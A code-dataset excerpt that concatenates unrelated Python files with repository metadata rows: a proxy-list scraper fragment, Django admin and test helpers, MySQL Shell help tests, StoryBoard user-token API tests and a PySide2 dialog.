xpathPort = '//*[@id="post-box"]/div/section/table/tbody/tr[' + str(count) + ']/td[2]/text()'
xpathPass = '//*[@id="post-box"]/div/section/table/tbody/tr[' + str(count) + ']/td[3]/text()'
xpathEnc = '//*[@id="post-box"]/div/section/table/tbody/tr[' + str(count) + ']/td[4]/text()'
#xpathPlace = '//*[@id="post-box"]/div/section/table/tbody/tr[' + str(count) + ']/td[6]'
ip = c.xpath(xpathIP)
if ip == []:
break
r.append({'server':ip[0],'server_port':c.xpath(xpathPort)[0],'password':c.xpath(xpathPass)[0],'method':c.xpath(xpathEnc)[0]})
return r
| 38 | 133 | 0.568609 | 150 | 1,064 | 4 | 0.393333 | 0.06 | 0.09 | 0.12 | 0.393333 | 0.393333 | 0.393333 | 0.393333 | 0.341667 | 0.341667 | 0 | 0.014943 | 0.182331 | 1,064 | 27 | 134 | 39.407407 | 0.674713 | 0.133459 | 0 | 0 | 0 | 0 | 0.332971 | 0.20457 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0.111111 | 0.111111 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
778576c10bbe70454c010137342f7b1e385656b7 | 1,478 | py | Python | config.py | Agasper/gaben | 7418a79d0809c34b5ab63a2b201305f89445eb19 | [
"MIT"
] | null | null | null | config.py | Agasper/gaben | 7418a79d0809c34b5ab63a2b201305f89445eb19 | [
"MIT"
] | null | null | null | config.py | Agasper/gaben | 7418a79d0809c34b5ab63a2b201305f89445eb19 | [
"MIT"
] | null | null | null | API_KEY = ""
DONT_PRINT_USAGE_FOR = []
REP_DIRECTORY = "C:\\GabenStorage"
MAX_UPLOAD_SIZE_MB = 300
UNITY = {
"2017.2.0f3": "C:\\Program Files\\Unity\\Editor\\Unity.exe",
"2017.4.3f1": "C:\\Program Files\\Unity2017.4.3\\Editor\\Unity.exe"
}
QUOTES = ["I'm a handsome man with a charming personality.", \
"If Nvidia makes better graphics technology, all the games are going to shine", \
"If we come out with a better game, people are going to buy more PCs.", \
"The PC is successful because we're all benefiting from the competition with each other.", \
"I think Windows 8 is a catastrophe for everyone in the PC space.", \
"The Steam store is this very safe, boring entertainment experience", \
"Photoshop should be a free-to-play game.", \
"The easiest way to stop piracy is not by putting antipiracy technology to work", \
"Ninety percent of games lose money; 10 percent make a lot of money", \
"Solar Games perhaps a best place to work", \
"The programmers of tomorrow are the wizards of the future. ", \
"Don't ever, ever try to lie to the internet.", \
"I've always wanted to be a giant space crab.", \
"George Lucas should have distributed the 'source code' to Star Wars.", \
"The PS3 is a total disaster on so many levels", \
"I'd like to thank Sony for their gracious hospitality, and for not repeatedly punching me in the face."]
def get_random_quote():
import random
return random.choice(QUOTES) | 52.785714 | 109 | 0.696211 | 237 | 1,478 | 4.299578 | 0.662447 | 0.015702 | 0.025515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02292 | 0.202977 | 1,478 | 28 | 110 | 52.785714 | 0.842105 | 0 | 0 | 0 | 0 | 0.037037 | 0.759973 | 0.047329 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.037037 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7786c106803d9e2cbd937d3ffdaefd0630b720b5 | 1,219 | py | Python | unittest/scripts/auto/py_shell/scripts/util_help_norecord.py | mueller/mysql-shell | 29bafc5692bd536a12c4e41c54cb587375fe52cf | [
"Apache-2.0"
] | 119 | 2016-04-14T14:16:22.000Z | 2022-03-08T20:24:38.000Z | unittest/scripts/auto/py_shell/scripts/util_help_norecord.py | mueller/mysql-shell | 29bafc5692bd536a12c4e41c54cb587375fe52cf | [
"Apache-2.0"
] | 9 | 2017-04-26T20:48:42.000Z | 2021-09-07T01:52:44.000Z | unittest/scripts/auto/py_shell/scripts/util_help_norecord.py | mueller/mysql-shell | 29bafc5692bd536a12c4e41c54cb587375fe52cf | [
"Apache-2.0"
] | 51 | 2016-07-20T05:06:48.000Z | 2022-03-09T01:20:53.000Z | #@ util help
util.help()
#@ util help, \? [USE:util help]
\? util
#@ util check_for_server_upgrade help
util.help('check_for_server_upgrade')
#@ util check_for_server_upgrade help, \? [USE:util check_for_server_upgrade help]
\? check_for_server_upgrade
# WL13807-TSFR_1_1
#@ util dump_instance help
util.help('dump_instance');
#@ util dump_instance help, \? [USE:util dump_instance help]
\? dump_instance
# WL13807-TSFR_2_1
#@ util dump_schemas help
util.help('dump_schemas');
#@ util dump_schemas help, \? [USE:util dump_schemas help]
\? dump_schemas
# WL13804-TSFR_6_1
#@ util dump_tables help
util.help('dump_tables');
#@ util dump_tables help, \? [USE:util dump_tables help]
\? dump_tables
# WL13804-TSFR_1_4
#@ util export_table help
util.help('export_table');
#@ util export_table help, \? [USE:util export_table help]
\? export_table
#@ util import_json help
util.help('import_json')
#@ util import_json help, \? [USE:util import_json help]
\? import_json
#@ util import_table help
util.help('import_table')
#@ util import_table help, \? [USE:util import_table help]
\? import_table
#@ util load_dump help
util.help('load_dump')
#@ util load_dump help, \? [USE:util load_dump help]
\? load_dump
| 21.017241 | 82 | 0.73749 | 188 | 1,219 | 4.473404 | 0.12234 | 0.11415 | 0.142687 | 0.124851 | 0.21522 | 0.103448 | 0 | 0 | 0 | 0 | 0 | 0.026365 | 0.128794 | 1,219 | 57 | 83 | 21.385965 | 0.765537 | 0.641509 | 0 | 0 | 0 | 0 | 0.250602 | 0.057831 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.222222 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
778e7c20b282230893c8d830986a05ad41c75dfa | 479 | py | Python | globus/afisha/admin.py | Ecmek/kino-globus | 31d61da551ece237cbfed6b96f7fdf49b8c06c9f | [
"BSD-3-Clause"
] | 3 | 2021-08-02T04:35:53.000Z | 2021-08-17T07:29:53.000Z | globus/afisha/admin.py | Ecmek/kino-globus | 31d61da551ece237cbfed6b96f7fdf49b8c06c9f | [
"BSD-3-Clause"
] | null | null | null | globus/afisha/admin.py | Ecmek/kino-globus | 31d61da551ece237cbfed6b96f7fdf49b8c06c9f | [
"BSD-3-Clause"
] | null | null | null | from django.contrib import admin
from .models import Cinema, ShowTime
class CinemaAdmin(admin.ModelAdmin):
list_display = ('title', 'genre', 'trailer', 'description', 'mpaa',)
search_fields = ('title',)
empty_value_display = '-пусто-'
class ShowTimeAdmin(admin.ModelAdmin):
list_display = ('cinema', 'datetime', 'price', 'format',)
autocomplete_fields = ('cinema',)
admin.site.register(Cinema, CinemaAdmin)
admin.site.register(ShowTime, ShowTimeAdmin)
| 25.210526 | 72 | 0.713987 | 51 | 479 | 6.588235 | 0.588235 | 0.095238 | 0.113095 | 0.154762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137787 | 479 | 18 | 73 | 26.611111 | 0.813559 | 0 | 0 | 0 | 0 | 0 | 0.156576 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.818182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
778ea5a8d867748ca6cad50ed3e26fab5276625c | 402 | py | Python | printer/colors.py | lsmucassi/pretty_printer | 3db6a656dc3d299f2f939b24bcd0fbce86045b52 | [
"MIT"
] | null | null | null | printer/colors.py | lsmucassi/pretty_printer | 3db6a656dc3d299f2f939b24bcd0fbce86045b52 | [
"MIT"
] | null | null | null | printer/colors.py | lsmucassi/pretty_printer | 3db6a656dc3d299f2f939b24bcd0fbce86045b52 | [
"MIT"
] | null | null | null | class Colors:
def __init__(self):
self.color_dict = {
"ERROR": ';'.join([str(7), str(31), str(47)]),
"WARN": ';'.join([str(7), str(33), str(40)]),
"INFO": ';'.join([str(7), str(32), str(40)]),
"GENERAL": ';'.join([str(7), str(34), str(47)])
}
def get_cformat(self, message_type):
return self.color_dict[message_type] | 33.5 | 59 | 0.482587 | 52 | 402 | 3.557692 | 0.480769 | 0.151351 | 0.172973 | 0.237838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069444 | 0.283582 | 402 | 12 | 60 | 33.5 | 0.572917 | 0 | 0 | 0 | 0 | 0 | 0.059553 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.1 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7791064a4d310761029e6775a24459c383307554 | 255 | py | Python | doozerlib/constants.py | tnozicka/doozer | c5d4031293153679eacaf6c4d0bcb1fe5e0e2fac | [
"Apache-2.0"
] | null | null | null | doozerlib/constants.py | tnozicka/doozer | c5d4031293153679eacaf6c4d0bcb1fe5e0e2fac | [
"Apache-2.0"
] | null | null | null | doozerlib/constants.py | tnozicka/doozer | c5d4031293153679eacaf6c4d0bcb1fe5e0e2fac | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import, print_function, unicode_literals
# Environment variables to disable Git stdin prompts for username, password, etc
GIT_NO_PROMPTS = {
"GIT_SSH_COMMAND": "ssh -oBatchMode=yes",
"GIT_TERMINAL_PROMPT": "0",
}
| 28.333333 | 80 | 0.768627 | 33 | 255 | 5.545455 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004587 | 0.145098 | 255 | 8 | 81 | 31.875 | 0.834862 | 0.305882 | 0 | 0 | 0 | 0 | 0.308571 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77984a9436d4a3b5de5e37b9e6fe5e44d68889cf | 2,175 | py | Python | tests/utils.py | paul-serafimescu/growth-tracker | 972dd1de534225a9be2e763045db560f420a844c | [
"MIT"
] | 1 | 2021-07-28T04:21:12.000Z | 2021-07-28T04:21:12.000Z | tests/utils.py | paul-serafimescu/growth-tracker | 972dd1de534225a9be2e763045db560f420a844c | [
"MIT"
] | null | null | null | tests/utils.py | paul-serafimescu/growth-tracker | 972dd1de534225a9be2e763045db560f420a844c | [
"MIT"
] | null | null | null | from django.test import TestCase, RequestFactory
from django.contrib.auth.models import AbstractBaseUser, AnonymousUser
from django.test.client import CONTENT_TYPE_RE
from django.views import View
from django.urls import resolve
from abc import abstractclassmethod, ABCMeta
from typing import Any, Callable, Union, Type
from json import dumps
class ViewTest(TestCase, metaclass=ABCMeta):
user: Union[AbstractBaseUser, AnonymousUser]
factory: RequestFactory
@abstractclassmethod
def setUpTestData(cls) -> None:
raise NotImplementedError()
class DecoratorError(Exception):
def __init__(self, message: str, *args: Any, **kwargs: Any):
self.message = message
def __str__(self) -> str:
return f"invalid decorator usage: '{self.message}'"
def route(request_type: str, url: str, view: Type[View], headers: dict[str, Any] = {}, data: dict[str, Any] = {}, logged_in: bool = False):
""" this is totally nuts
i can't believe i spent time on this
"""
def inner_function(function: Callable[..., Any]):
def wrapped(self, *args, **kwargs):
if not isinstance(self, ViewTest):
raise DecoratorError('argument is not an instance method')
_, _args, _kwargs = resolve(url)
_data = dumps(data)
request_types = {
'patch': self.factory.patch(url, _data, content_type='application/json'),
'get': self.factory.get(url),
'post': self.factory.post(url, _data, content_type='application/json'),
'put': self.factory.put(url, _data, content_type='application/json'),
# 'head': self.factory.head(url, _data, content_type='application/json'),
'delete': self.factory.delete(url, _data, content_type='application/json'),
'options': self.factory.options(url, _data, content_type='application/json'),
'trace': self.factory.trace(url),
}
if (request := request_types.get(request_type)) is None:
raise KeyError('invalid request type')
if logged_in:
request.user = self.user
request.headers = headers
return function(self, view.as_view()(request, *_args, **_kwargs), *args, **kwargs)
return wrapped
return inner_function
| 40.277778 | 139 | 0.694253 | 270 | 2,175 | 5.455556 | 0.351852 | 0.059742 | 0.057026 | 0.07332 | 0.13442 | 0.13442 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18069 | 2,175 | 53 | 140 | 41.037736 | 0.826599 | 0.06023 | 0 | 0 | 0 | 0 | 0.102564 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.139535 | false | 0 | 0.186047 | 0.023256 | 0.511628 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
779db1909e89a924773ce4c275b00bc51e3b47f1 | 572 | py | Python | manage_room/migrations/0005_auto_20170129_0024.py | gaybro8777/coding-night-live | b10aeefbcb35fa388a18cb983638ed5983c1874b | [
"MIT"
] | 73 | 2017-01-26T16:45:12.000Z | 2021-07-05T20:27:38.000Z | manage_room/migrations/0005_auto_20170129_0024.py | gaybro8777/coding-night-live | b10aeefbcb35fa388a18cb983638ed5983c1874b | [
"MIT"
] | 93 | 2017-01-25T18:28:02.000Z | 2019-06-10T22:11:38.000Z | manage_room/migrations/0005_auto_20170129_0024.py | dduk-ddak/coding-night-live | be7b0b9a89a9a5332c0980dbc3698602266a1e8c | [
"MIT"
] | 22 | 2017-02-12T12:51:17.000Z | 2020-09-08T02:38:20.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-01-28 15:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('manage_room', '0004_auto_20170127_1505'),
]
operations = [
migrations.RemoveField(
model_name='slide',
name='prev_id',
),
migrations.AlterField(
model_name='slide',
name='next_id',
field=models.PositiveSmallIntegerField(unique=True),
),
]
| 22.88 | 64 | 0.59965 | 59 | 572 | 5.59322 | 0.762712 | 0.054545 | 0.084848 | 0.109091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.080882 | 0.286713 | 572 | 24 | 65 | 23.833333 | 0.727941 | 0.118881 | 0 | 0.235294 | 1 | 0 | 0.115768 | 0.045908 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
779e9f40e92537973be64d2dc298cc911fe154df | 11,165 | py | Python | storyboard/tests/api/test_user_tokens.py | Sitcode-Zoograf/storyboard | 5833f87e20722c524a1e4a0b8e1fb82206fb4e5c | [
"Apache-2.0"
] | null | null | null | storyboard/tests/api/test_user_tokens.py | Sitcode-Zoograf/storyboard | 5833f87e20722c524a1e4a0b8e1fb82206fb4e5c | [
"Apache-2.0"
] | null | null | null | storyboard/tests/api/test_user_tokens.py | Sitcode-Zoograf/storyboard | 5833f87e20722c524a1e4a0b8e1fb82206fb4e5c | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from storyboard.tests import base
class TestUserTokensAsUser(base.FunctionalTest):
def setUp(self):
super(TestUserTokensAsUser, self).setUp()
self.resource = '/users/2/tokens'
self.default_headers['Authorization'] = 'Bearer valid_user_token'
def test_browse(self):
"""Assert a basic browse for your own tokens.
"""
response = self.get_json(self.resource, expect_errors=True)
self.assertEqual(200, response.status_code)
def test_unauthorized_browse(self):
"""Assert a basic browse for someone else's tokens
"""
response = self.get_json('/users/1/tokens', expect_errors=True)
self.assertEqual(403, response.status_code)
def test_get_empty(self):
"""Assert that a user may get an empty record and receive a 404
response.
"""
response = self.get_json(self.resource + '/99', expect_errors=True)
self.assertEqual(404, response.status_code)
def test_simple_create_and_retrieve(self):
"""Assert that a user may create tokens for themselves."""
token = {
'user_id': 2,
'expires_in': 3600,
'access_token': 'test_token'
}
response = self.post_json(self.resource, token)
self.assertEqual(response.json['user_id'], 2)
self.assertEqual(response.json['expires_in'], 3600)
self.assertEqual(response.json['access_token'], 'test_token')
self.assertIsNotNone(response.json['id'])
read_response = self.get_json(self.resource + '/' +
six.text_type(response.json['id']))
self.assertEqual(response.json['user_id'],
read_response['user_id'])
self.assertEqual(response.json['expires_in'],
read_response['expires_in'])
self.assertEqual(response.json['access_token'],
read_response['access_token'])
self.assertIsNotNone(response.json['id'],
read_response['id'])
def test_delete_all_user_tokens(self):
"""Assert that user may delete all his tokens
"""
resource = self.resource + "/delete_all"
self.delete(resource)
response = self.get_json(self.resource, expect_errors=True)
self.assertEqual(401, response.status_code)
def test_create_access_token_autofill(self):
"""Assert that creating a token without the access_token parameter
generates a randomly generated access token.
"""
token = {
'user_id': 2,
'expires_in': 3600
}
response = self.post_json(self.resource, token)
self.assertEqual(response.json['user_id'], 2)
self.assertEqual(response.json['expires_in'], 3600)
self.assertIsNotNone(response.json['access_token'])
self.assertTrue(len(response.json['access_token']) > 10)
self.assertIsNotNone(response.json['id'])
def test_cannot_create_duplicate_token(self):
"""Assert that a user may not violate the uniqueness constraint on user
tokens.
"""
token = {
'user_id': 2,
'expires_in': 3600,
'access_token': 'valid_user_token'
}
response = self.post_json(self.resource, token, expect_errors=True)
self.assertEqual(409, response.status_code)
def test_update_expiration_date(self):
"""Assert that a user may ONLY update the expiration time on their
own tokens.
"""
token = {
'user_id': 2,
'expires_in': 3600
}
response = self.post_json(self.resource, token)
self.assertEqual(response.json['expires_in'], 3600)
self.assertIsNotNone(response.json['access_token'])
self.assertIsNotNone(response.json['id'])
new_record = response.json.copy()
new_record['expires_in'] = 3601
updated = self.put_json(self.resource + '/' +
six.text_type(response.json['id']),
new_record, expect_errors=True)
self.assertEqual(updated.json['expires_in'], 3601)
def test_delete_token(self):
"""Assert that a user may delete their own user tokens."""
token = {
'user_id': 2,
'expires_in': 3600
}
response = self.post_json(self.resource, token)
self.assertEqual(response.json['expires_in'], 3600)
self.assertIsNotNone(response.json['access_token'])
self.assertIsNotNone(response.json['id'])
response = self.delete(self.resource + '/' +
six.text_type(response.json['id']),
expect_errors=True)
self.assertEqual(204, response.status_code)
def test_create_unauthorized(self):
"""Assert that a user cannot create a token for someone else."""
token = {
'user_id': 3,
'expires_in': 3600
}
response = self.post_json('/users/3/tokens', token, expect_errors=True)
self.assertEqual(403, response.status_code)
def test_get_unauthorized(self):
"""Assert that a user cannot retrieve a token for someone else."""
response = self.get_json('/users/1/tokens/1', expect_errors=True)
self.assertEqual(403, response.status_code)
def test_update_unauthorized(self):
"""Assert that a user cannot update a token for someone else."""
token = {
'user_id': 1,
'expires_in': 3601
}
response = self.put_json('/users/1/tokens/1', token,
expect_errors=True)
self.assertEqual(403, response.status_code)
def test_delete_unauthorized(self):
"""Assert that a user cannot delete a token for someone else."""
response = self.delete('/users/1/tokens/1', expect_errors=True)
self.assertEqual(403, response.status_code)
def test_funny_business(self):
"""Assert that a user cannot create a token for someone else by
swapping the ID in the payload while still accessing their own user
id rest endpoint.
"""
token = {
'user_id': 3,
'expires_in': 3600
}
response = self.post_json(self.resource, token, expect_errors=True)
self.assertEqual(403, response.status_code)
class TestUserTokensAsNoUser(base.FunctionalTest):
def setUp(self):
super(TestUserTokensAsNoUser, self).setUp()
self.resource = '/users/2/tokens'
def test_unauthorized_browse(self):
"""Assert a basic browse for someone else's tokens.
"""
response = self.get_json('/users/1/tokens', expect_errors=True)
self.assertEqual(401, response.status_code)
def test_create_unauthorized(self):
"""Assert that a user cannot create a token for someone else."""
token = {
'user_id': 3,
'expires_in': 3600
}
response = self.post_json('/users/3/tokens', token, expect_errors=True)
self.assertEqual(401, response.status_code)
def test_get_unauthorized(self):
"""Assert that a user cannot retrieve a token for someone else."""
response = self.get_json('/users/1/tokens/1', expect_errors=True)
self.assertEqual(401, response.status_code)
def test_update_unauthorized(self):
"""Assert that a user cannot update a token for someone else."""
token = {
'user_id': 1,
'expires_in': 3601
}
response = self.put_json('/users/1/tokens/1', token,
expect_errors=True)
self.assertEqual(401, response.status_code)
def test_delete_unauthorized(self):
"""Assert that a user cannot delete a token for someone else."""
response = self.delete('/users/1/tokens/1', expect_errors=True)
self.assertEqual(401, response.status_code)
class TestUserTokensAsSuperuser(base.FunctionalTest):
def setUp(self):
super(TestUserTokensAsSuperuser, self).setUp()
self.default_headers['Authorization'] = 'Bearer valid_superuser_token'
def test_other_browse(self):
"""Assert a basic browse for someone else's tokens.
"""
response = self.get_json('/users/2/tokens', expect_errors=True)
self.assertEqual(200, response.status_code)
self.assertEqual(len(response.json), 2)
def test_create_other(self):
"""Assert that a superuser CAN create a token for someone else."""
token = {
'user_id': 3,
'expires_in': 3600,
'access_token': 'test_token'
}
response = self.post_json('/users/3/tokens', token)
self.assertEqual(response.json['user_id'], 3)
self.assertEqual(response.json['expires_in'], 3600)
self.assertEqual(response.json['access_token'], 'test_token')
self.assertIsNotNone(response.json['id'])
def test_get_other(self):
"""Assert that a superuser CAN retrieve a token for someone else."""
response = self.get_json('/users/2/tokens/3', expect_errors=True)
self.assertEqual(200, response.status_code)
self.assertEqual(2, response.json['user_id'])
self.assertEqual('valid_user_token', response.json['access_token'])
def test_update_other(self):
"""Assert that a superuser CAN update a token for someone else."""
response = self.get_json('/users/2/tokens/3', expect_errors=True)
self.assertEqual(200, response.status_code)
self.assertEqual(2, response.json['user_id'])
self.assertEqual('valid_user_token', response.json['access_token'])
new_record = response.json.copy()
new_record['expires_in'] = 3601
put_response = self.put_json('/users/2/tokens/3', new_record,
expect_errors=True)
self.assertEqual(200, put_response.status_code)
self.assertEqual(2, put_response.json['user_id'])
self.assertEqual(3601, put_response.json['expires_in'])
def test_delete_other(self):
"""Assert that a superuser CAN delete a token for someone else."""
response = self.delete('/users/2/tokens/3', expect_errors=True)
self.assertEqual(204, response.status_code)
response = self.get_json('/users/2/tokens/3', expect_errors=True)
self.assertEqual(404, response.status_code)
| 37.847458 | 79 | 0.628482 | 1,343 | 11,165 | 5.064036 | 0.131794 | 0.094839 | 0.05411 | 0.067637 | 0.779297 | 0.772386 | 0.697839 | 0.631378 | 0.613586 | 0.56477 | 0 | 0.025306 | 0.260278 | 11,165 | 294 | 80 | 37.97619 | 0.79816 | 0.19382 | 0 | 0.655914 | 0 | 0 | 0.116011 | 0.002393 | 0 | 0 | 0 | 0 | 0.284946 | 1 | 0.145161 | false | 0 | 0.010753 | 0 | 0.172043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77a8d6e727c876130667c55f98c00492271efba6 | 17,554 | py | Python | pjrd/formulaSetupDialog.py | NAustinO/Nutrition-Assistant | 520383cdb2c9c2d087ce6e425786b71235febd4b | [
"MIT"
] | 1 | 2022-03-25T23:31:20.000Z | 2022-03-25T23:31:20.000Z | pjrd/formulaSetupDialog.py | NAustinO/Nutrition-Assistant | 520383cdb2c9c2d087ce6e425786b71235febd4b | [
"MIT"
] | null | null | null | pjrd/formulaSetupDialog.py | NAustinO/Nutrition-Assistant | 520383cdb2c9c2d087ce6e425786b71235febd4b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'formulaSetupDialog.ui'
##
## Created by: Qt User Interface Compiler version 5.15.1
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
import sys
import os
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
sys.path.append('../pjrd')
from pjrd.helpers import test, dbConnection
from pjrd.formulaEditor import formulaEditorDialog
os.environ['QT_MAC_WANTS_LAYER'] = '1'
class formulaSetupDialog(QDialog):
def __init__(self, mainWindow):
super(formulaSetupDialog, self).__init__()
self.mainWindow = mainWindow
self.setupUi(self)
self.setupLogic()
def setupUi(self, formulaSetupDialog):
if not formulaSetupDialog.objectName():
formulaSetupDialog.setObjectName(u"formulaSetupDialog")
formulaSetupDialog.resize(672, 419)
sizePolicy = QSizePolicy(QSizePolicy.Maximum, QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(formulaSetupDialog.sizePolicy().hasHeightForWidth())
formulaSetupDialog.setSizePolicy(sizePolicy)
formulaSetupDialog.setMaximumSize(QSize(678, 419))
self.verticalLayout = QVBoxLayout(formulaSetupDialog)
self.verticalLayout.setObjectName(u"verticalLayout")
self.dialogHeaderLabel = QLabel(formulaSetupDialog)
self.dialogHeaderLabel.setObjectName(u"dialogHeaderLabel")
font = QFont()
font.setPointSize(13)
self.dialogHeaderLabel.setFont(font)
self.dialogHeaderLabel.setAutoFillBackground(True)
self.dialogHeaderLabel.setAlignment(Qt.AlignCenter)
self.verticalLayout.addWidget(self.dialogHeaderLabel)
self.line_2 = QFrame(formulaSetupDialog)
self.line_2.setObjectName(u"line_2")
self.line_2.setFrameShape(QFrame.HLine)
self.line_2.setFrameShadow(QFrame.Sunken)
self.verticalLayout.addWidget(self.line_2)
self.headerFrame = QFrame(formulaSetupDialog)
self.headerFrame.setObjectName(u"headerFrame")
sizePolicy1 = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Minimum)
sizePolicy1.setHorizontalStretch(0)
sizePolicy1.setVerticalStretch(0)
sizePolicy1.setHeightForWidth(self.headerFrame.sizePolicy().hasHeightForWidth())
self.headerFrame.setSizePolicy(sizePolicy1)
self.headerFrame.setFrameShape(QFrame.StyledPanel)
self.horizontalLayout_2 = QHBoxLayout(self.headerFrame)
self.horizontalLayout_2.setObjectName(u"horizontalLayout_2")
self.revisionPromptLabel = QLabel(self.headerFrame)
self.revisionPromptLabel.setObjectName(u"revisionPromptLabel")
self.horizontalLayout_2.addWidget(self.revisionPromptLabel)
self.headerRadioBtnContainer = QWidget(self.headerFrame)
self.headerRadioBtnContainer.setObjectName(u"headerRadioBtnContainer")
self.horizontalLayout = QHBoxLayout(self.headerRadioBtnContainer)
self.horizontalLayout.setObjectName(u"horizontalLayout")
self.newFormulaRadioBtn = QRadioButton(self.headerRadioBtnContainer)
self.newFormulaRadioBtn.setObjectName(u"newFormulaRadioBtn")
self.horizontalLayout.addWidget(self.newFormulaRadioBtn)
self.revisionRadioBtn = QRadioButton(self.headerRadioBtnContainer)
self.revisionRadioBtn.setObjectName(u"revisionRadioBtn")
self.horizontalLayout.addWidget(self.revisionRadioBtn)
self.horizontalLayout_2.addWidget(self.headerRadioBtnContainer)
self.verticalLayout.addWidget(self.headerFrame)
self.bodyContainerWidget = QWidget(formulaSetupDialog)
self.bodyContainerWidget.setObjectName(u"bodyContainerWidget")
self.horizontalLayout_4 = QHBoxLayout(self.bodyContainerWidget)
self.horizontalLayout_4.setObjectName(u"horizontalLayout_4")
self.newFormulaContainerFrame = QFrame(self.bodyContainerWidget)
self.newFormulaContainerFrame.setObjectName(u"newFormulaContainerFrame")
self.newFormulaContainerFrame.setFrameShape(QFrame.StyledPanel)
self.verticalLayout_3 = QVBoxLayout(self.newFormulaContainerFrame)
self.verticalLayout_3.setObjectName(u"verticalLayout_3")
self.formulaContainerLabel = QLabel(self.newFormulaContainerFrame)
self.formulaContainerLabel.setObjectName(u"formulaContainerLabel")
self.formulaContainerLabel.setAlignment(Qt.AlignCenter)
self.verticalLayout_3.addWidget(self.formulaContainerLabel)
self.formulaNamePromptLabel = QLabel(self.newFormulaContainerFrame)
self.formulaNamePromptLabel.setObjectName(u"formulaNamePromptLabel")
self.verticalLayout_3.addWidget(self.formulaNamePromptLabel)
